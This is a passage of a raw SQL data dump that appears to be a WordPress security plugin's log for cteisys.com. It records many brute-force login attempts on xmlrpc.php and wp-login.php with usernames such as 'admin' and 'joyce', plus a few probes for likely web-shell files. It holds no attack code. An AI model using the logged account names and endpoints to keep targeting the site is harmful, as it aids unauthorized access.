0|0|cteisys.com/xxx.php',0,19,0),('20.118.129.10',343310602,'',0,1665249464.0755,55,'RSyidu2ks1GP3KFT4qJtfBVD','','19|0|0|0|cteisys.com/y.php',0,19,0),('20.118.129.10',343310602,'',0,1665249468.2588,55,'kiOGuaR0mvjxSrWhplctDFV1','','19|0|0|0|cteisys.com/z.php',0,19,0),('104.254.90.187',1761499835,'joyce',0,1665249992.7216,152,'VMCa5TG93IAHKJj0vuFNZ2Dn','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('67.205.62.27',1137524251,'newd',0,1665250428.1974,7,'2MDNPUsIGK1TygpqHhfXln9c','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('103.152.164.103',1738056807,'newd',0,1665264863.4235,152,'gRdtZ5COTHnzUmKbAV9vi8Qe','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('8.210.102.36',148006436,'newd',0,1665265354.8922,152,'R6wQOfjApGUd0P1FDYTctZW5','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.254.12.61',1744702525,'newd',0,1665265376.5990,152,'p5SAycbFeWTmLEfKnGgr2X9k','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('54.38.44.6',908471302,'newd',0,1665265909.5798,152,'aWoOnYFG9bQSk5CxMcVvAw4B','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('209.141.57.9',3515693321,'newd',0,1665265918.2261,7,'guKUiezLEflvoORnHw7c0dmI','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('167.172.168.111',2813110383,'newd',0,1665266129.2777,7,'mbJzCE2BUX5G6k8qhPnwRout','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('194.163.132.194',3265496258,'newd',0,1665268051.7271,152,'Grdo4xM7vA38ROBE2pIZVPYy','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('69.163.152.108',1168349292,'newd',0,1665268103.7412,7,'XN7T4ty2r8C31haFKvi6MBgR','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('111.90.150.36',1868207652,'newd',0,1665268602.2303,152,'KxDVIRoE30mX8uwaeOlUfzMT','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('173.212.215.38',2916407078,'newd',0,1665268603.1268,152,'cEptZNW3wHiXBe6Ovyx2VURa','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('5.101.157.241',90545649,'newd',0,1665269171.4109,152,'M0qhlsHINpbYT67PRd8DOoCB','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('83.143.116.3',1401910275,'newd',0,1665269171.4961,152,'YBMzgTHGSZCm4ox51kAnK92O','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('39.106.15.209',661262289,'newd',0,1665269715.4266,152,'GlB4MwS96vAdUeuc8JEVXtZx','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('104.219.251.247',1759247351,'newd',0,1665269728.0457,152,'I4tOZ2cUJTSb5MjvadqiY3hA','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('124.153.66.86',2090418774,'newd',0,1665272076.2166,7,'HCFJBkOyNu5Vw2QSr9dYeonI','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('123.31.21.26',2065634586,'newd',0,1665272574.2704,152,'2ex5dVGSFWIhpJNUltuwHq93','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('5.101.156.219',90545371,'newd',0,1665272625.0127,152,'BoOCMuy2VtdfnihkN9PAvDKb','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('148.72.209.0',2487800064,'newd',0,1665273153.0683,152,'Olzi9MNJTVynkIh1WQ5CUS0q','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('114.132.250.235',1921317611,'newd',0,1665273167.7167,152,'p6olPt79JfXYWeZHmEjd8S4L','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('62.102.148.166',1046910118,'joyce',0,1665273353.0365,152,'EzR8KVtjWZOPMk2lUSDiJA4I','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('87.248.153.52',1475909940,'newd',0,1665275610.4795,152,'GH0O7o5gFSRbWT1CMJclisxf','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('43.251.135.37',737904421,'newd',0,1665276095.6097,7,'HW5AKPFXbr2CtJ7qe0pwBzRO','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('167.99.78.164',2808303268,'newd',0,1665276154.4698,152,'x2EYDIzH1UrKCjveB0FPQn4O','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('124.158.12.83',2090732627,'newd',0,1665276791.7611,152,'FnWLA8XSdRHj7GJ04bTt9wlD','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('162.214.123.41',2731965225,'newd',0,1665276813.1308,152,'4glcLCs9EiDSpZPwrtWU0mqe','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('123.31.21.26',2065634586,'newd',0,1665278634.7463,152,'m6hlg3TVdBv1HUni5frw2YZc','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('198.12.250.252',3322739452,'newd',0,1665278675.5342,152,'cK4YgJWTUuorZNExvFkeVDLt','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('51.210.99.98',869426018,'newd',0,1665279306.6529,152,'cTrXas19i7A63PpkCSe2omhw','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('203.112.72.51',3413133363,'newd',0,1665279315.0300,152,'PtT81D5WdeCBLX37kY4nzVwQ','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('192.30.89.75',3223214411,'joyce',0,1665279551.3802,152,'vaR5TLy9NioZ86KwSQPDngkl','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('177.52.160.29',2973016093,'newd',0,1665279952.0689,152,'guaDrkTodl7HCL8qOs6FKfw4','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('157.230.15.115',2649100147,'newd',0,1665280121.8658,7,'Mj2VsLB9Tgv1U3yt5qRedxZN','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('51.142.90.138',864967306,'',0,1665280295.3292,55,'MDkhapNCv0wUBjEezic15QXO','','19|0|0|0|cteisys.com/wp-plain.php',0,19,0),('209.145.54.196',3515954884,'newd',0,1665280554.9621,152,'iZoRkaGndK4CeHQpIt1mgB7T','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('194.233.67.171',3270067115,'newd',0,1665280567.3207,152,'zXM6SPGZotyEW1lvYI2TVBpN','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('202.29.236.140',3390958732,'newd',0,1665282127.8843,7,'r20wOfQRvoiqcthg4EbB6uVy','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('103.27.238.234',1729883882,'newd',0,1665282522.4945,152,'NirtkVBhWJ42FLx5ugyzfXpH','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('194.163.132.194',3265496258,'newd',0,1665282522.5234,152,'2oJTuFbzqScfGvUtwdhaWM75','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('207.244.239.41',3488935721,'newd',0,1665283146.0514,152,'2c194G8hawZHNRbgyP0KluD3','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('51.91.83.187',861623227,'newd',0,1665283155.1208,152,'iEAbRKZJp3Gm7gxwlk95LHfq','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.197.195.173',3116745645,'newd',0,1665283782.0805,152,'BNqntpEcSgbRefF5i69Yu4zK','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('38.242.221.235',653450731,'newd',0,1665283785.3600,152,'2HKfGbOXFDTygkVojWh0usw3','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('173.236.184.116',2917972084,'newd',0,1665284123.1123,7,'0mFDGSr6i4s7qjZH9YanWClo','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('74.208.103.228',1255172068,'newd',0,1665284397.3422,152,'Tv1K4puD6rIEcZQ950OwNhjF','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('198.244.167.101',3337922405,'newd',0,1665368994.5661,7,'mFld8qicsUKwtXxRA743oZTn','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('35.198.25.12',600185100,'newd',0,1665369055.7398,152,'lbChnt0ypKjRsTXHqBrAzkEd','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('119.237.81.29',2012041501,'newd',0,1665369426.8771,7,'iKMQVgqvI2aRxd1o4HWbjh7s','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('184.75.221.203',3091979723,'joyce',0,1665369561.5712,152,'f8a3hAVBIZtrsDKYH4N1TqFe','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('141.94.247.170',2371811242,'newd',0,1665370003.3700,7,'cRrpUCludz4JZNK7nmkOE6o5','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('89.238.150.43',1508808235,'Joyce',0,1665370223.1076,152,'BwMcD1pOs4rfHFRqmnIYEd6G','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('66.29.131.126',1109230462,'newd',0,1665370324.9910,152,'pmM9dDjQFHK0AqNfO4oJxkzw','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('173.236.169.240',2917968368,'newd',0,1665370443.5453,7,'fD3vpS5giqtxPEXcrTkwKsbO','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('213.152.161.118',3583549814,'joyce',0,1665372228.1284,152,'hjNSYkiI9CGKWpHM4zfu0eUb','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('66.94.117.33',1113486625,'newd',0,1665372390.0639,152,'5oa6LhujIWzMpR4tZrwD29PK','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('167.71.69.173',2806465965,'newd',0,1665372770.2237,152,'ySqG6IhXilQz2kuCvoZLUV53','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('147.135.255.8',2475163400,'newd',0,1665373083.6552,7,'u9gZpSR0f5c3bIKjQMrGeDsa','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('108.167.189.59',1822932283,'newd',0,1665373113.9968,152,'WQd5mABMHINqGo4j7n8PhLkJ','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('157.245.140.35',2650115107,'newd',0,1665373309.5493,152,'3wdBxEJfVKZW7mikvXALg1Rj','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('81.70.248.169',1363605673,'newd',0,1665373517.5825,7,'c28EKWogrnYkzS9qyJFLCdiO','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('118.98.64.188',1986150588,'newd',0,1665373601.5036,152,'80LyXI4isTwmhvcbA3ldu2nK','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('167.172.105.95',2813094239,'newd',0,1665374115.0445,7,'MKgCblJGPe94pT1iZ3SvLtmy','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('194.163.132.194',3265496258,'newd',0,1665374185.7823,152,'8CIvzH3LjiTeq1MBmaRo9Ar4','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('109.168.97.89',1839751513,'newd',0,1665455646.2925,7,'MzcKCr3qlBTIUDWQh21oteng','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('157.245.246.208',2650142416,'newd',0,1665456070.8641,7,'cSkqDhxvVX6FOZoYQpPiLJwA','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('68.235.52.36',1156264996,'joyce',0,1665456284.9013,152,'gaZWutEbi2KHDohVXQL01UO5','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('207.154.248.39',3483039783,'newd',0,1665456678.2823,7,'Q3hbdg5OmryJ8FLG14xX9TUi','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('184.75.223.195',3091980227,'joyce',0,1665457086.4655,152,'WV4BfU35uZwkheKpXDEONGP0','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('188.166.61.228',3165011428,'newd',0,1665457099.0931,7,'IyMJehFbDUHxZEV5A7s0amcw','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('157.230.127.126',2649128830,'newd',0,1665541290.6911,7,'FJ6AhMIWS5sytaLfXCixc41j','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('34.78.198.205',575588045,'newd',0,1665541749.4985,7,'nbQa37swqmcNrB4eFXfY02TM','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('151.106.35.235',2540315627,'admin',0,1665541898.5704,152,'LFtSr1Oi3y6gG2loNUW8BVhp','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('64.227.183.25',1088665369,'newd',0,1665542452.5815,7,'go5Yny6p9UBES7zCQerdHVqA','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('188.165.198.224',3164980960,'newd',0,1665543288.1026,7,'WOnR5XSg2s6z3CVyAplemIFt','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('209.126.8.92',3514697820,'admin',0,1665543567.2097,152,'bgkEKGnReY0BPxJLtV5hs7jz','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('190.169.30.9',3198754313,'admin',0,1665627956.7037,152,'WVUHQ92kZmF3yw5hBELX0PYS','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('51.91.83.187',861623227,'admin',0,1665628250.0528,152,'tXQh90pjJYLUGBMCVK51ZSl2','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('141.94.247.170',2371811242,'newd',0,1665628376.7324,7,'fFHtl2NQxRi4AO7Pr3h5eKEd','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('118.98.64.188',1986150588,'newd',0,1665629134.7474,152,'IZSzUgph2MYtlv7eWaLjTkds','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.111.30.40',1735335464,'newd',0,1665629414.8780,152,'jleIAROsdMYK2Lrcb5uEVaNG','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('159.89.228.214',2673468630,'newd',0,1665629744.4182,7,'rL4Nb5TlVZhXqIDnOeYFv3pa','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('62.90.101.113',1046111601,'newd',0,1665633206.4561,152,'SrE7MF9PvD0QOVW1BiAnxhTd','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('207.154.234.6',3483036166,'newd',0,1665633352.7092,152,'XsEudPbcC24eyOYzlGMJFpax','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('47.110.72.238',795756782,'newd',0,1665633856.8374,7,'H2AMZmyc31jI7UxwsrqDRfXW','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('194.163.35.152',3265471384,'newd',0,1665636574.8575,7,'FOgCGv2NKwWJkAMT8t6XmSoH','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('198.12.254.32',3322740256,'admin',0,1665636832.1774,152,'pb2gs0qj8AfkN3r7G9DeTtLS','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('178.62.110.145',2990435985,'admin',0,1665636915.3246,152,'38EhHOn7uqvVfxTpzQPLG0mZ','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('167.99.78.164',2808303268,'admin',0,1665638407.4967,152,'wyCJlVSOkMzfa0IBcK5vxDX1','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('66.175.217.71',1118820679,'admin',0,1665638498.7227,152,'RUOKnfBCMjv35iEIVYQWuhoZ','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.23.117.170',3105322410,'admin',0,1665638810.7004,152,'iVpYQAuSGhoybfR2H6dTekvC','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.110.84.132',1735283844,'admin',0,1665638894.0296,152,'SUGjOqygHio2wz8ANLPQM4Kf','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('146.59.243.31',2453402399,'',0,1665639108.1819,55,'TCHXZ8beAjDnv2Pw0yrYpJ7O','','19|0|0|0|cteisys.com/wp-content/plugins/ioptimization/IOptimize.php',0,19,0),('137.184.209.117',2310590837,'admin',0,1665639166.8111,152,'GYQFkmoCSwJAWZ530NdsnV6e','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('61.219.43.253',1037773821,'newd',0,1665639264.9000,7,'lkSY1KnJEtHIuwxLXpoWj9Tc','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('103.171.180.139',1739306123,'admin',0,1665639559.0501,152,'UOWtBDTPrxcM8KVESA1aCwbG','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('157.245.140.35',2650115107,'admin',0,1665639637.1886,152,'V0mKuwRgilSsZbkHEJFYXv1d','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('104.45.41.45',1747790125,'admin',0,1665639964.0806,152,'rvOxyT894oeJ0QghU1Ek2jfD','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('80.87.194.140',1347928716,'admin',0,1665640309.1261,152,'z3e6QmE1ws509jKlncy2WBNI','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('124.70.98.118',2084987510,'admin',0,1665640398.2229,152,'IpOR1XQ2GxmLkbSV4DsJWABZ','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('115.78.122.58',1934522938,'newd',0,1665640600.7281,7,'OgPbEdWhrMFHfRZqx4CpSJeu','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('209.124.90.80',3514587728,'admin',0,1665646220.9476,152,'K8ORIdNbyewnXEcaZmCz9TvY','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('213.152.162.94',3583550046,'Joyce',0,1665646315.1655,152,'Zxpj2SIAbzqtkmBndKwvU0PM','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('192.64.113.147',3225448851,'admin',0,1665646563.4739,152,'e8BPkR4XtOfaN7UGg0Hr9IEs','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('68.183.177.20',1152889108,'admin',0,1665646639.8056,152,'8lIf1ymMdExZK9kih3e2SoAq','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('213.152.161.69',3583549765,'joyce',0,1665646913.5763,152,'nSC26fk7aBdVEO9z5mNhwyHj','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('167.71.141.164',2806484388,'newd',0,1665647321.1755,7,'bFJjiewh1CTYacEDvB4KzQMx','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('8.210.102.36',148006436,'admin',0,1665647460.1406,152,'tF8igvNu67pjTIZfleBUY345','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('193.107.158.16',3245055504,'admin',0,1665647564.8770,152,'rhuP7CT9GLy346iFakcXJQKf','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('209.141.37.194',3515688386,'Joyce',0,1665647581.6070,51,'xln9pefAWJ8wCivRyqSYBHTh','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('82.102.23.139',1382422411,'joyce',0,1665647623.9847,152,'ICxAtRcFD2NdYbSwsKLk4pZv','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('194.233.67.171',3270067115,'admin',0,1665647925.1549,152,'OnbxCYNrsFtzcp9f41lKWT5Z','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('115.78.160.53',1934532661,'newd',0,1665650456.6887,152,'Newb8m1Kzdg7qyxPTki5VS43','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('198.244.143.200',3337916360,'newd',0,1665650463.8130,152,'sT3cnKdNvL9UmCAp8ubkSa65','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('74.208.59.254',1255160830,'newd',0,1665650464.4382,152,'5alHijO7rbtuUn1pSZYCsTgD','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('178.170.41.94',2997496158,'newd',0,1665650472.4704,152,'4c3dN68SHTfpZwXbuDOlMJo0','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('82.165.81.9',1386565897,'newd',0,1665650474.7976,152,'UlEf4QsRhnPeZuTz2AWLmHxD','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('78.142.63.31',1317945119,'newd',0,1665650482.3804,152,'ubLPgoBCcti1Op0UQJvj8aym','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('8.210.174.93',148024925,'admin',0,1665650831.3260,152,'F8Ai9waNhgD5nXJMZfSTEKCr','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('192.163.194.31',3231957535,'admin',0,1665650948.3923,152,'I1zfOAhaCiXqduslWBgFwtoD','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('184.168.121.5',3098048773,'admin',0,1665651348.4213,152,'fBVA3xur1Ykt2G6Ds5lWcqLP','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('120.27.133.69',2015069509,'newd',0,1665651413.0847,7,'nGPAmIMSBCWbQk0NOFpyqxoD','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('8.142.173.121',143568249,'newd',0,1665654178.4934,7,'DHbYpAfZyWRCwjoV4tsIz9mF','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('161.97.90.217',2707512025,'newd',0,1665654371.7822,152,'O15o9KVL6iXsH2vuqcFP4Q8e','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('82.165.81.9',1386565897,'newd',0,1665654371.7824,152,'rFYo5Ole0V9SgCRNPwTx14fq','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('68.183.22.104',1152849512,'newd',0,1665654372.5049,152,'0ISYTQA1FCsyxVa9jgcpiz7Z','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('82.165.87.63',1386567487,'newd',0,1665654380.7133,152,'oqwRd8xj5ZN1YnUH9JvIyW7O','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.247.11.240',1744243696,'newd',0,1665654386.5099,152,'GKi8I0hcJ5QBkAlVoOZgsdXW','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.107.112.75',3110826059,'newd',0,1665654390.1956,152,'VaN3kRI0Ju7pb8Zl5EKsnLqx','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('49.12.114.46',822899246,'newd',0,1665654392.1361,152,'X5DqjhdAaKOwpB9HFgR1ZEMC','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('35.202.169.54',600484150,'newd',0,1665654399.9506,152,'wFZz3NGMj1qTSCLVPod5OYme','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('119.28.78.249',1998343929,'newd',0,1665654404.3304,152,'2BugQ1NLzXG4bFYMrTjZoRPd','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('45.64.187.254',759217150,'newd',0,1665654407.5384,152,'qwQWuDr4g5n9pYPylHeEtZsS','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('209.124.90.80',3514587728,'newd',0,1665654535.5441,152,'CzpwDb0MSTloZRnqWyc7Neur','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('66.228.32.9',1122246665,'newd',0,1665654910.2786,152,'gqiwMyd8rhpnN5LRoYQGsXxj','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('2.59.119.2',37451522,'newd',0,1665654910.3889,152,'Wq8FP3vasowJAtpN7u1ITZnh','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('93.186.242.173',1572532909,'newd',0,1665654910.4910,152,'iqJ3d6T7nxMbEYOgySfoHBRr','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('67.222.142.146',1138658962,'newd',0,1665654912.6927,152,'PWXlDChScQHRK0qntIe9xN3O','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.171.180.165',1739306149,'newd',0,1665654915.3391,152,'PsyaVwJ6Ai2IhB1uYkMZDOxt','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('67.225.161.250',1138860538,'newd',0,1665654917.7493,152,'AHRr1s5qtBc2kCKdo0Z84fwb','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('67.225.161.250',1138860538,'newd',0,1665654924.6069,152,'VLW3orDuySn4OHdTf9EevxC0','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.50.56.4',3107076100,'newd',0,1665654929.1386,152,'w4xdRHAn35zifLBogqTh6uVk','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('68.183.22.104',1152849512,'newd',0,1665654938.8850,152,'P2DhYVr0EHoG5xZbjS9RInCK','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('70.34.133.151',1176667543,'newd',0,1665654938.9268,152,'CRsvSJp0Bh5YQVT7MF9bgyU4','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('175.178.241.165',2947740069,'newd',0,1665654949.1855,152,'24VwhXNbrEme7PHjZuMBQ8YD','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('23.226.89.72',400709960,'newd',0,1665654951.2137,152,'GQRlKFVZOcWAnjwe5gJ8T6k2','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('67.23.254.254',1125646078,'newd',0,1665655051.1554,152,'vV5cyPLpAuQglZG3MfUsnNSz','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('194.42.98.32',3257557536,'newd',0,1665655477.3826,152,'m5TODL6nNUyXi40JRgkaHWI1','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('164.92.169.121',2757536121,'newd',0,1665656282.2543,152,'HlRkM7wUBXzjYscEDFm5WnJq','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('31.184.215.230',532207590,'newd',0,1665656291.4055,152,'82qXvbt5WuUALldQ9CBiegh1','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('49.12.114.46',822899246,'newd',0,1665656301.6183,152,'9RjCpnSI3rN8lZBw6sW1Muzo','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.166.182.177',1738978993,'newd',0,1665656516.9055,152,'O2DtFEQbLriS4Ux0KNshC3IG','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.171.180.165',1739306149,'newd',0,1665656642.8437,152,'VJsSLK9u6D5GCwZXWcBvbfrp','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('146.148.44.185',2459184313,'newd',0,1665656994.3871,7,'ipsjoCJwb9GcYLgNZT6B7EIP','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('193.112.202.112',3245394544,'newd',0,1665657056.3914,152,'sFDiqXMedot5rwN7C1vPy92W','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('62.102.148.187',1046910139,'Joyce',0,1665657132.9871,152,'1a2Dh4R0mPbNVq73KHOdpcts','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('190.169.30.9',3198754313,'newd',0,1665657227.4189,152,'mQ2cLXUYFdye6Kg0t8DCJ4EP','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('128.199.109.135',2160553351,'newd',0,1665657732.9662,152,'kGPtiu4AK2oFVyzsMUljCvXE','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('66.29.138.73',1109232201,'newd',0,1665658158.9256,152,'r9LoNKS6ciFVxdI3UX4sGvk8','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('162.144.49.214',2727358934,'newd',0,1665658303.7605,152,'sQGHCx07v3KjMUAYaqWJ92tB','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('138.68.180.230',2319758566,'newd',0,1665658377.0401,7,'98ETQqd1cH3kb6hItPRKXm4p','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('51.159.105.232',866085352,'newd',0,1665658711.8394,152,'L8qjXok1aSh3BVTrdEKc5pwM','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('134.209.222.89',2261900889,'newd',0,1665659725.2997,152,'xgcB9ukXTyWKlHNE1fR6t7eh','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('183.90.250.15',3076192783,'newd',0,1665659731.5754,152,'jFoH5RS4ZGCTDi2qpngukX0r','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('62.3.41.108',1040394604,'newd',0,1665659737.3735,152,'7jAFb0JVIYLkMDt8l1uXNa2T','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('91.134.248.245',1535572213,'newd',0,1665659743.2829,152,'drOeBucLP2vJFhzSkxpR98qf','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('93.186.242.173',1572532909,'newd',0,1665659743.9601,152,'cTB01XAe4NZECLdWDsjY35vk','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.27.60.66',1729838146,'newd',0,1665659748.7780,152,'cM42ClLvk5sPTw3zqotfdeJj','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('51.79.207.190',860868542,'newd',0,1665659752.8113,152,'1VQEMbg0TYsr4iCHXjftA5zn','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('121.78.79.85',2035175253,'newd',0,1665659758.3299,152,'9AwL8JkyCYi2G4TqNR60PgeI','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('119.28.78.249',1998343929,'newd',0,1665659759.8851,152,'veUQK9ubHZLoDNxAnf2dz1O4','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('49.12.114.46',822899246,'newd',0,1665659765.4014,152,'94wUfARQWKEYT0BIyhaSsojO','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('159.223.170.181',2682235573,'newd',0,1665659774.7789,7,'O3s4roqX6mxzFSJWjtgdHiu0','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('167.114.64.93',2809282653,'newd',0,1665659777